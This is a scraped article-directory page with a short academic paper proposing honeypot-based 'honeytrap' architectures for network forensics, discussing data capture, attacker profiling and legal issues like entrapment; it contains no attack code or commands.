AN IMPLEMENTATION OF NETWORK FORENSICS TOOL FOR INFORMATION SECURITY

Free Online Articles Directory

Why Submit Articles?
Top Authors
Top Articles
FAQ
ABAnswers

Publish Article

0 && $. browser. msie ) {
var ie_version = parseInt($. browser. version);
if(ie_version Login

Email
Password

Remember me?Lost Password?

Home Page > Computers > Computer Forensics > AN IMPLEMENTATION OF NETWORK FORENSICS TOOL FOR INFORMATION SECURITY

Categories
AdvertisingArts & EntertainmentAutomotiveBeautyBusinessCareersComputersEducationFinanceFood and BeverageHealthHobbiesHome and FamilyHome ImprovementInternetLawMarketingNews and SocietyRelationshipsSelf ImprovementShoppingSpiritualitySports and FitnessTechnologyTravelWriting

]]>

AN IMPLEMENTATION OF NETWORK FORENSICS TOOL FOR INFORMATION SECURITY

By: S. MYTHILI
Posted: Oct 03, 2010
Views: 146

Introduction
There are two primary reasons for gathering information about computer crimes. First, information is gathered to allow criminals to be prosecuted in court.     Second, information is gathered that will help create counter-measures to prevent crimes. This is the goal of deception technology such as Honey pots. In this paper, we address some specific ways these two information-gathering technologies can be combined.
Background
        For years, computer and network security experts (white hats) have fought to stay ahead of computer criminals (black hats). As black hats became more skilled and computers became more powerful, conventional security measures became less effective. This perpetual action-response reaction cycle evolved into a new field of study known as Computer and Network Forensics. (CNF). CNF is the art of discovery and retrieval of information about computer related crime in such a way that the gathered information is admissible in court.
        There are two sides to CNF efforts. The first is to assess the impact of the malicious or suspect act or acts. In order to bring a computer criminal to justice, it must be possible to show that sufficient damage has been done so that the act can be accurately classified as a crime. Often, there is an economic threshold associated with statutes that govern computer crime. The second part is to gather information that legally binds the act or acts that caused the damage to the perpetrator. This is the better known aspect of computer crime investigation; the standard “Who dun’ it” component.
In response to innovative computer criminals, CNF techniques have become highly sophisticated and CNF tools are increasingly effective. In addition to putting computer criminals in jail, CNF techniques have enabled white hats to learn valuable information about black hats’ techniques and methods and to formulate protection and defense mechanisms, tools, and techniques.
        Until recently, the relationship between CNF and mainstream computer and network security techniques has been vague at best. By their nature, security efforts traditionally depend on actions that are taken before an attack to protect resources or information from malicious access or use. This is done through access control techniques, encryption, and vulnerability assessment mechanisms.                                 More recently, significant effort has been focused on providing attack detection and response technology that works during suspected attacks to protect resources.
Alternatively, CNF traditionally has had a different focus from both of these two perspectives. First, CNF is concerned with gathering information about attacks and perpetrators rather than directly protecting resources or information. Consequently, the second fundamental 3 difference is that CNF has historically dedicated its efforts to actions taken after-the-fact, i. e. after malicious or suspicious activity has occurred, rather than activity that occurs before or during attacks.
             An early effort to systematically connect CNF and security was given. That work fundamentally extended the scope of CNF by proposing policies and techniques that could be implemented before an attack occurred that facilitate the CNF effort both during and after malicious or suspicious activity occurred. This paper is an extension of that idea based on using independently implemented systems to gather information that enable CNF experts to put computer criminals that attack production systems into jail.
       Deception technology is well known in the security practitioner arena [DTHP] and a mathematical foundation for its effectiveness was prescribed . The related concepts of deception security, Honey pots, and Honeynets [HN] have been the subject of organized investigation for several years. We coin the term “Honeytraps” to reflect the tools that fall into any of these categories.
       Honeytraps allow us collect information about black hat activities without putting a real system at risk. In this paper we show how honey trap technology can be a valuable elements of a forensic too HONEYTRAPS
Honeytraps are systems (Honey pots or Honeynets) that are designed to be compromised. Honeypots are host systems that attract1 intruders to enter the host by emulating a known vulnerability. Essentially, they are modified production systems that create contained environments where intruder actions can be more safely monitored and documented. Their have
      We intend to convey a soft interpretation of “attraction” here. The notion of attracting intruders is counterproductive in most senses. We address the specifics of how and why this is true later in the paper. Their main goal is to capture and analyze data in order to learn about the blackhat community.
      Honeynets, on the other hand, are a network of interconnected production and honeypot nodes. They protect the production resource only by distracting the intruder from the real target. Like Honeypots, Honeynets are designed to collect information from intruders and attempted intruders while containing the operations that these intruders can perform
PITFALLS OF HONEYTRA
      There are several potential pitfalls of honeytraps, one based on its foundational goal of being a system that is established to be compromised. A concern is that once an intruder enters the honeytrap, they may be able to utilize some component of the honeytrap for an illicit purpose,e. g. as a zombie in a distributed denial of service attack. Containment involves the policies,architecture, procedures, and techniques taken by a honeytrap creator to protect against such an occurrence.

     A second concern is that once the blackhat enters the honeytrap, they may be able to attack the honeytrap itself, shielding their actions from the designed honeytrap monitors or by destroying or modifying the honeytrap activity logs. There are many discussions of how to avoid these and other honeytrap pitfalls in the literature and on relevant web pages. For the purposes of this paper, we posit without proof, that these pitfalls can be effectively overcome.
Data Capture

        Once a blackhat penetrates a honeytrap, there must be mechanisms in place to detect and record the actions that the intruder takes. Detecting and recording that activity is termed Data Capture. Data Capture should record every possible aspect of the blackhat activity, from keystrokes to transmitted packets. The purpose of data capture is to collect data to determine tools, tactics, habits, and motives of specific blackhats, and of the blackhat community [KEH].

Honeytrap Uses
Honeytrap are intended to let the blackhats in and allow them to operate in order to monitor their actions. As information is collected, blackhats are profiled and their techniques are analyze
Documenting Blackhat Techniques       For years whitehats have dedicated efforts and resources to study the blackhat community with the ultimate goal of learning blackhat techniques. From earlier efforts, such as hacker surveys [Me98], to the cutting edge technology such as that implemented in the honeynet project, whitehats have used their knowledge to investigate the mystery of blackhats and the working of the hacking process. In 1999, MacClure [HE99] shed some light on this subject when he documented the process of hacking by breaking it down into stages that most blackhats goes through during an attack. The anatomy described by MacClure includes four stages: proving, invading, mischief, and covering tracks. Documenting the blackhats activities during these four stages allows us to create a signature that can be used to identify a specific blackhat.

]]>

Profiling Specific Blackhats

        Through the literature produced from previous research, blackhats techniques, tactics,motives and psychology have been documented [KEM00]. We now use this information tocreate signatures to characterize specific blackhats. For example, suppose our blackhat is a script kiddy. Script kiddies are inexperienced blackhats that try to break into systems using scripts created by knowledgeable blackhats. A signature for this blackhat may include, for example,level of skill, methodology, tactics, tools, and other information such as the originating site for scripts.

Letting Them In or Inviting Them In

        An essential element of deception technology is that hackers must enter the trap in order to for the trap to gather information. By many reports, hacking and probing is sufficiently widespread that simply placing a computer on the Internet will naturally result in intruders entering the computer. Still, there is no guarantee that there will be enough of any interesting types of hacking in the computer to allow effective information gathering.
    In order to be effective, honeytraps may need to generate hacking traffic by attracting intruders into the honeytrap. As we alluded to earlier, attracting blackhats into a honeytrap is not without risks and honeytrap operators may be liable for damage to other systems if the blackhats are able to turn the honeytrap into an attack engine.
       From a forensics standpoint, attracting intruders raises legal issues as well. If the attraction is sufficiently overt, the intruder’s entry may be justified; in other words, honeytraps may be legally considered fair game to intruders. Additionally, even if the intrusion is found to be illegal, the intruder may be able to claim that the attraction of the honeytrap served as entrapment. A challenge of combining forensics and honeytrap technologies is to resolve these issues.

Honeytrap Approaches

Honeytraps are inherently flexible and can be implemented in a wide variety of ways. There are three primary considerations that guide the approach that we recommend:

1) System vulnerabilities,
2) Operating system attacks and
3) Network system attacks.

        For the first, we can configure honeytraps to identify a specific vulnerability or set of vulnerabilities within a host or system. For example, the honeytrap “BackOfficer Friendly” [BOF] can be configured to emulate the specific vulnerability known as Back Orifice. When blackhats find this honeytrap and recognize that the Back Orifice vulnerability is open, BackOfficer Friendly carefully tracks their activities in the honeytrap to see how they exploit the vulnerability. The tool extends the process by assessing the impacts of the recorded actions.
       In the second category, we can configure a honeytrap to mimic an operating system to determine what vulnerabilities these systems have. The honeytraps Mantrap [MT] and CyberCop [CCS] are examples of automated tools that implement honeypots that assess operating system vulnerabilities. Each of these tools can concurrently simulate multiple operating systems vulnerabilities.
    In the final category, we can configure a honeytrap to simulate a network system and monitor the system behaves and how its components interact under attack. Honeytraps are an effective technique to test changes in systems, such as addition of new software or significant configuration changes to determine possible risk and vulnerabilities before they are implemented in the real system.

Honeytraps Used For Forensics?

          With the introduction of honeytraps, the face of information gathering changed, putting whitehats in the offensive rather than the defensive mode. The purpose of honeytraps is to gather intelligence about the enemy to learn the tools, tactics, and motives of the blackhat community [HN]. To date, the information collected in honeytraps has not been intended for presentation in court. In order to use the information collected in honeytraps to prosecute the blackhat there are numerous legal issues to deal with.
        As we discussed earlier, when an intruder is attracted (no matter how subtle that attraction may be) into a honeytrap, the honeytrap owner assumes liability for the actions the intruder taken on the honeytrap.
For example, if the intruder is able to turn the honeytrap into a zombie to affect a distributed denial of service attack, the subject of that attack may claim damages from the honeytrap owner. Containment technology employing wrappers and sandbox techniques reduce the vulnerability, but are far from perfect.

        Secondly, if an intruder is attracted into a honeytrap, it is unlikely that the intrusion itself can be prosecuted as a crime, even if the activity that the intruder engages after entry is clearly malicious. Proving crimes relative to invited participants is more legally complicated than for acts carried out by uninvited intruders.

    Additionally, honeytraps are not real systems, they contain no valuable data, and they have no real users. As a result, there is no real economic impact and no real damage that can result from honeytrap intrusions. Honeytraps are created to be attacked, so it is unlikely that an intruder could be prosecuted for activities they undertake within a honeytrap since it would be difficult to categorize the results of their activities as a crime.

     Even if a crime can be established, if the intruder was attracted into the honeytrap, it is a good chance that they will be able to employ an entrapment defense. Even subtle attractions can be used to defeat prosecution via anti-entrapment laws.
      Finally, honeytrap operators must deal with legal issues related to privacy. While privacy issues are not well defined on the Internet (or in society in general) honeytrap operators may face invasion of privacy claims either in response to their attempts to prosecute intruders, or independently from malicious or non-malicious intruders that do not desire to have their activities or identities revealed.

COMPUTER AND NETWORK FORENSICS
Overview.
Computer and Network Forensics, is the art of retrieving information about a crime in such a way as to make that information admissible as evidence in court. The CNF ultimate goal is to provide sufficient evidence to allow the blackhat to be successfully prosecuted. CNF techniques are used to discover evidence in a variety of crimes ranging from theft of trade secrets, to protection of intellectual property, to general misuse of computers.

Forensics State of the Art

As we noted earlier, previous CNF efforts included only after-the-fact activities as modeled. In the traditional model, gathering potential evidence started only after an attack was detected and an investigation was set in motion. In [MY01] a variation was introduced to this cycle that allows the forensic process to be continuous.

HONEYTRAPS AS FORENSIC TOOLS

    In the previous section we introduced the traditional forensic model and then described how this model changed with the additions introduced in MY01. In the next sections we introduce two architectures that allow honeytraps to be used as CNF tools. We show how these developments transform the forensic model to create the parallel and the serial forensic architectures. In addition, we discuss the role of honeytraps in the forensic process.

     As we have noted, honeytraps are designed to provide insight into blackhat methods, tactics, and targets. To gather this information, blackhats must be tracked through the system, with every action being recorded for later analysis. This information provides a basis to determine how the blackhat works and allows the analyst to predict what this blackhat, or a class of blackhats, may do in the future.

    We notice that information gathered from Honeytraps may be used to develop a profile of each blackhat that is monitored. By tracking the actions, a signature for attacks can be created that we can use to identify and prosecute the blackhat.

ARCHITECTURES

           Honeytraps come in many shapes and sizes. They are highly configurable and therefore can be designed to meet the needs and capabilities of a wide variety of specific systems. Once the Honeytrap is designed, the architecture of how to connect the Honeytrap to the Internet in reference to the production system must be determined. Two architectures that facilitate the forensic investigation are the serial and parallel architectures.

Serial Architecture

    The serial honeytrap architecture works by placing the honeytrap between the Internet and the production system as shown in Figure 3. In this configuration, the honeytrap acts as a firewall. All recognized users are filtered to the production system while blackhats are contained in the honeytrap. The blackhats’ activities are monitored and all the information collected is routed to another system that is protected by a firewall, to ensure the integrity of the data.
       The serial architecture forces the blackhat to go through the honeytrap to attack theproduction system thus exposing all attackers to the honeytrap monitoring techniques. This may also enhance tracing capability, since it may be possible to follow blackhats as they transition between the honeytrap and the production system, making it easier for the forensic investigation to match the blackhat in the honeytrap to the blackhat in the production system.

     There are numerous detractors to the serial architecture. We first notice that it is resource intensive.
One of the important characteristics of Honeytraps is that they need not deal with real users, thus reducing the volume and complexity of monitoring. However, in the serial connection the honeytrap must handle all traffic going into the production system and reroute the authorized user to the production system. Additionally, were it easy to contain intruders in a firewall, we would not need honeytraps. This architecture runs the fundamental risk that intruders that it attracts into the honeytrap, may subsequently successfully attack the production system in inspite of the best containment efforts of the honeytrap.

Parallel Architecture

         Alternatively, the parallel configuration allows the honeytrap to be independent of the production system as shown in Figure 4. As with the serial configuration, the information gathered about blackhat activities in the honeytrap is rerouted to a separate, protected system.
    This architecture is less resource intensive so it can be implemented in a system with fewer resources. As with the serial architecture, here are several drawbacks with the parallel honeytrap architecture. The first is that for the honeytrap to be useful during the forensic process, both systems (honeytrap and production) must have been attacked independently. Configuring the honeytrap so that it is likely that an intruder would enter or probe the honeytrap before or shortly after entering the production systems is tricky, and again leads us into possible entrapment scenarios.
       Secondly, under the parallel honeytrap architecture it is likely to be more difficult to connect an intruder in the honeytrap to the intruder in the production system if the honeytrap is implemented in the parallel configuration, since there is no direct connection between them as we had in the serial architecture.

THE FORENSIC INVESTIGATION

       In both architectures, the forensic investigation procedure and goal is the same. The forensic investigation is broken down into two separate investigations. The forensic investigation begins in the evidence collected from the honeytrap, which will refer to as Honeytrap Forensic Investigation (HTFI). The second investigation is based on the on the evidence collected from the production system, which we will refer to as Production System Forensic Investigation (PSFI). Both investigations will produce a piece of the puzzle.
       The goal in the HTFI is to produce a damage report and a signature for the blackhat. For example, suppose A is the blackhat that broke into the honeytrap, then the HTFI will produce:
1) A -> identity
2) A -> tactics
3) A -> tools
4) A -> targets
5) A -> other info

       Because less information about the blackhat is available in the production system, the blackhat’s signature may only be partial. For example, suppose B is the blackhat that broke into the production system, then the PSFI might include:

1) B -> tactics
2) B -> tools
3) B -> targets
4) B -> other info

    An essential element of this investigation is to determine the identity of the intruder in the production system. The PSFI provides blackhat B’s partial signature and a damage report, but not
blackhat B’s identity. The HTFI establishes blackhat A’s identity, but A cannot be charged because he was in a honeytrap, so no real damage can be shown in court. So, we need the identity of blackhat B to charging him with the damage report.
The question is, “How can we use what we know about blackhat A to discover who blackhat B is?” The answer is that if we can show that the tactics, tools, targets, and other information signatures of intruder B are identical to those of intruder A, we may be able to make a compelling argument that A and B are the same person. If so, since the identity of intruder A is known, the match would enable the case to be pursued.

CONCLUSION

In this paper we present a new model for Computer and Network Forensics (CNF). We develop two architectures for utilizing deception technology (and coined the term Honeytraps to describe them) in CNF investigations. We give an implementation model for these architectures that illustrates how these two mutually exclusive technologies can be combined to improve Computer and Network Forensic Investigations.

BIBLIOGRAPHY

1. “Design and Implementation of a Scalable Intrusion Detection System for the Protection of Network Infrastructure”, DARPA Information Survivability Conference and Exposition 2000, Jan 25-27, 2000, Vol. 2, pp 69-83
Stuart MacClure, Joel Scambray, George Kurtz,

2. “Hacking Exposed: Network Security Secrets and Solutions”, Osborne/McGraw-Hill 1999 Carolyn P. Meinel,

3. “The Happy Hacker, A Guide to Mostly Harmless Computer
Hacking”, 2nd Ed. Scientific American, Inc. 1998

4. Yanet Manzano and Alec Yasinsac, “Policies to Enhance Computer and Network Forensics”, 2nd Annual IEEE Systems, Man, Cybernetic Information Assurance Workshop,
June 2001.

5. Vigna and Kemmerer, “NetSTAT: A Network-based Intrusion Detection System”

6. “Journal of Computer Security”, Volume 7, Issue 1, 1999

S. MYTHILI – About the Author:
1. Ms. S. Mythili,
    Asst. Prof,Department of Computer Application,
    PSGR Krishnammal College for women,Coimbatore.
2. Ms. V. Gowrilatha
    Asst. Prof,Department of Computer Science,
    KSG College of Arts & Science,Coimbatore.

Source: http://www. articlesbase. com/computer-forensics-articles/an-implementation-of-network-forensics-tool-for-information-security-3393396. html

]]>

Increase your traffic today just by submitting articles with us, click here to get started.

Liked this article? Click here to publish it on your website or blog, it’s free and easy!

Rate this Article

1
2
3
4
5

vote(s)
0 vote(s)

Feedback
Print

0) {
ch_selected = Math. floor(Math. random()*ch_queries. length);
if(ch_selected == ch_queries. length) ch_selected–;
ch_query = ch_queries[ch_selected];
}
}catch(e){
ch_query = document. title;
}
]]>

Article Tags:
communication systems, networks, computer forensics, deception technology

Latest Computer Forensics Articles

Buy printing products using 4inkjets coupon
Those who are holding printing business or have high usage of inks and ink cartridges then should move to shop at 4inkjets coupon.
By: wooddavid

Computers >
Computer Forensics
May 25, 2011

RIFT News – You can transfer character freely with patch 1. 3
Trion Worlds has announced that with the advent of patch 1. 3, RIFT will allow players to move to select servers once per week — for free
By: mmocarts

Computers >
Computer Forensics
May 24, 2011

Dealing with PC Cleaner
A pc cleaner is a software tool that is used to clean up your personal computer by just clicking your mouse. Specifically, the tool can be utilize in various windows model as windows 7, xp and vista too. PC cleaner is designed to perform the following activities or services to your computer:
By: Ronald L Baker

Computers >
Computer Forensics
May 23, 2011

Significance of page flip
Page Flip is a file in which the publishers is use to publish their documents or files in a creative, modern and attractive way. The main characteristics of Page Flip are real spread, unlimited level of transparency, multiple or various Zoom level, transitions, images and colour of the background, background music, information and table of contents and menu for the selection of the language. Page Flip has the ability of two types of features which hare browsing features and building features.
By: jackstellon

Computers >
Computer Forensics
May 18, 2011

Home Cinema Systems,computer
I forever feel this must be one among the first questions you’d ask yourself while looking for the finest home cinema systems for you.
By: Cameron whitee

Computers >
Computer Forensics
May 16, 2011

Comments on this article [0]
Add new Comment

AN IMPLEMENTATION OF NETWORK FORENSICS TOOL FOR INFORMATION SECURITY

Leave a Reply

Newest Articles

Blogroll

Scope Types